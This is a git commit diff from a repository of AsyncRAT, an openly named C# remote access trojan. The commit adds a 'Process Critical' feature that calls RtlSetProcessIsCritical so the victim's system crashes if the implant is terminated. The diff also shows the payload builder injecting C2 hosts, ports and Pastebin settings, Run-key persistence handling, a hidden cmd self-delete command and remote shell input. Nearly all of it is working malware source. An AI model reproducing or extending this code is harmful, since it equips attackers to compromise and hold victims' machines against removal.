Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source 
-Added process critical - thanks to MrDevBot
-Add a method to handle client's exit
-Minor bugs fixed
This commit is contained in:
NYAN CAT 2019-05-20 18:34:33 +03:00
parent 4626e891b1
commit 1846a77b5a
13 changed files with 120 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
View File

File diff suppressed because one or more lines are too long

36
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs generated
View File

@ -46,6 +46,7 @@ namespace AsyncRAT_Sharp.Forms
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.groupBox3 = new System.Windows.Forms.GroupBox();
this.chkBdos = new System.Windows.Forms.CheckBox();
this.txtMutex = new System.Windows.Forms.TextBox();
this.label5 = new System.Windows.Forms.Label();
this.chkAnti = new System.Windows.Forms.CheckBox();
@ -54,6 +55,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1 = new System.Windows.Forms.TabPage();
this.tabPage2 = new System.Windows.Forms.TabPage();
this.tabPage3 = new System.Windows.Forms.TabPage();
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.groupBox1.SuspendLayout();
this.groupBox2.SuspendLayout();
this.groupBox3.SuspendLayout();
@ -61,11 +63,12 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.SuspendLayout();
this.tabPage2.SuspendLayout();
this.tabPage3.SuspendLayout();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// button1
//
this.button1.Location = new System.Drawing.Point(6, 236);
this.button1.Location = new System.Drawing.Point(3, 302);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(440, 49);
this.button1.TabIndex = 0;
@ -225,20 +228,32 @@ namespace AsyncRAT_Sharp.Forms
//
// groupBox3
//
this.groupBox3.Controls.Add(this.pictureBox1);
this.groupBox3.Controls.Add(this.chkBdos);
this.groupBox3.Controls.Add(this.txtMutex);
this.groupBox3.Controls.Add(this.label5);
this.groupBox3.Controls.Add(this.chkAnti);
this.groupBox3.Location = new System.Drawing.Point(6, 17);
this.groupBox3.Name = "groupBox3";
this.groupBox3.Size = new System.Drawing.Size(440, 174);
this.groupBox3.Size = new System.Drawing.Size(440, 229);
this.groupBox3.TabIndex = 9;
this.groupBox3.TabStop = false;
this.groupBox3.Text = "MISC";
//
// chkBdos
//
this.chkBdos.AutoSize = true;
this.chkBdos.Location = new System.Drawing.Point(21, 82);
this.chkBdos.Name = "chkBdos";
this.chkBdos.Size = new System.Drawing.Size(143, 24);
this.chkBdos.TabIndex = 12;
this.chkBdos.Text = "Process Critical";
this.chkBdos.UseVisualStyleBackColor = true;
//
// txtMutex
//
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtMutex.Location = new System.Drawing.Point(106, 98);
this.txtMutex.Location = new System.Drawing.Point(106, 165);
this.txtMutex.Name = "txtMutex";
this.txtMutex.Size = new System.Drawing.Size(271, 26);
this.txtMutex.TabIndex = 11;
@ -247,7 +262,7 @@ namespace AsyncRAT_Sharp.Forms
// label5
//
this.label5.AutoSize = true;
this.label5.Location = new System.Drawing.Point(14, 102);
this.label5.Location = new System.Drawing.Point(14, 169);
this.label5.Name = "label5";
this.label5.Size = new System.Drawing.Size(52, 20);
this.label5.TabIndex = 10;
@ -308,6 +323,16 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage3.Text = "Misc";
this.tabPage3.UseVisualStyleBackColor = true;
//
// pictureBox1
//
this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
this.pictureBox1.Location = new System.Drawing.Point(181, 74);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(32, 32);
this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize;
this.pictureBox1.TabIndex = 13;
this.pictureBox1.TabStop = false;
//
// FormBuilder
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@ -329,6 +354,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.ResumeLayout(false);
this.tabPage2.ResumeLayout(false);
this.tabPage3.ResumeLayout(false);
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
}
@ -359,5 +385,7 @@ namespace AsyncRAT_Sharp.Forms
private System.Windows.Forms.TabPage tabPage1;
private System.Windows.Forms.TabPage tabPage2;
private System.Windows.Forms.TabPage tabPage3;
private System.Windows.Forms.CheckBox chkBdos;
private System.Windows.Forms.PictureBox pictureBox1;
}
}

3
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
View File

@ -147,6 +147,9 @@ namespace AsyncRAT_Sharp.Forms
if (operand == "%Serversignature%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
if (operand == "%BDOS%")
methodDef.Body.Instructions[i].Operand = chkBdos.Checked.ToString().ToLower();
if (operand == "%Pastebin%")
if (chkPastebin.Checked)
methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text);

2
AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
View File

@ -16,6 +16,6 @@ namespace AsyncRAT_Sharp
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.4.8B";
public static readonly string Version = "AsyncRAT 0.4.8C";
}
}

1
AsyncRAT-C#/Client/Client.csproj
View File

@ -105,6 +105,7 @@
<DependentUpon>FormChat.cs</DependentUpon>
</Compile>
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Install\NormalStartup.cs" />
<Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" />

6
AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs
View File

@ -1,4 +1,5 @@
using Microsoft.Win32;
using Client.Helper;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
@ -6,6 +7,7 @@ using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
using System.Windows.Forms;
namespace Client.Handle_Packet
{
@ -28,7 +30,7 @@ namespace Client.Handle_Packet
}
};
proc.Start();
Environment.Exit(0);
Methods.ClientExit();
}
catch { }
}

43
AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
View File

@ -10,14 +10,14 @@ using System.Text;
namespace Client.Handle_Packet
{
public class HandleUninstall
public class HandleUninstall
{
public HandleUninstall()
{
if (Convert.ToBoolean(Settings.Install))
if (Convert.ToBoolean(Settings.Install))
{
try
{
try
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
else
@ -34,25 +34,24 @@ namespace Client.Handle_Packet
}
}
catch { }
}
ProcessStartInfo Del = null;
try
}
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
Del = new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
}
catch { }
finally
{
Methods.CloseMutex();
Process.Start(Del);
Environment.Exit(0);
}
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
}
catch { }
finally
{
Process.Start(Del);
Methods.ClientExit();
}
}
}
}

6
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -85,7 +85,7 @@ namespace Client.Handle_Packet
ClientSocket.Client.Dispose();
}
catch { }
Environment.Exit(0);
Methods.ClientExit();
break;
}
@ -98,7 +98,7 @@ namespace Client.Handle_Packet
}
catch { }
Process.Start(Application.ExecutablePath);
Environment.Exit(0);
Methods.ClientExit();
break;
}
@ -270,7 +270,7 @@ namespace Client.Handle_Packet
case "shellWriteInput":
{
if (HandleShell.ProcessShell != null)
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
break;
}

8
AsyncRAT-C#/Client/Helper/Methods.cs
View File

@ -43,5 +43,13 @@ namespace Client.Helper
_appMutex = null;
}
}
public static void ClientExit()
{
if (Convert.ToBoolean(Settings.BDOS))
ProcessCritical.Exit();
CloseMutex();
Environment.Exit(0);
}
}
}

32
AsyncRAT-C#/Client/Helper/ProcessCritical.cs Normal file
View File

@ -0,0 +1,32 @@
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Client.Helper
{
public static class ProcessCritical
{
public static void Set()
{
try
{
Process.EnterDebugMode();
RtlSetProcessIsCritical(1, 0, 0);
}
catch { }
}
public static void Exit()
{
try
{
RtlSetProcessIsCritical(0, 0, 0);
}
catch { }
}
#region "Native Methods"
[DllImport("ntdll.dll", SetLastError = true)]
private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
#endregion
}
}

3
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -69,9 +69,8 @@ namespace Client.Install
WindowStyle = ProcessWindowStyle.Hidden
});
}
Methods.CloseMutex();
Process.Start(Settings.ClientFullPath);
Environment.Exit(0);
Methods.ClientExit();
}
}
catch (Exception ex)

3
AsyncRAT-C#/Client/Program.cs
View File

@ -34,6 +34,9 @@ namespace Client
if (Convert.ToBoolean(Settings.Install))
NormalStartup.Install();
if (Convert.ToBoolean(Settings.BDOS))
ProcessCritical.Set();
#if DEBUG
ClientSocket.InitializeClient();
#else

7
AsyncRAT-C#/Client/Settings.cs
View File

@ -12,7 +12,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "AsyncRAT 0.4.8d";
public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Key = "NYAN CAT";
@ -23,10 +23,12 @@ namespace Client
public static string Anti = "false";
public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null";
public static string BDOS = "false";
#else
public static string Ports = "%Ports%";
public static string Hosts = "%Hosts%";
public static string Version = "AsyncRAT 0.4.9B";
public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "%Install%";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%");
public static string Key = "%Key%";
@ -37,6 +39,7 @@ namespace Client
public static readonly string Anti = "%Anti%";
public static Aes256 aes256;
public static string Pastebin = "%Pastebin%";
public static string BDOS = "%BDOS%";
#endif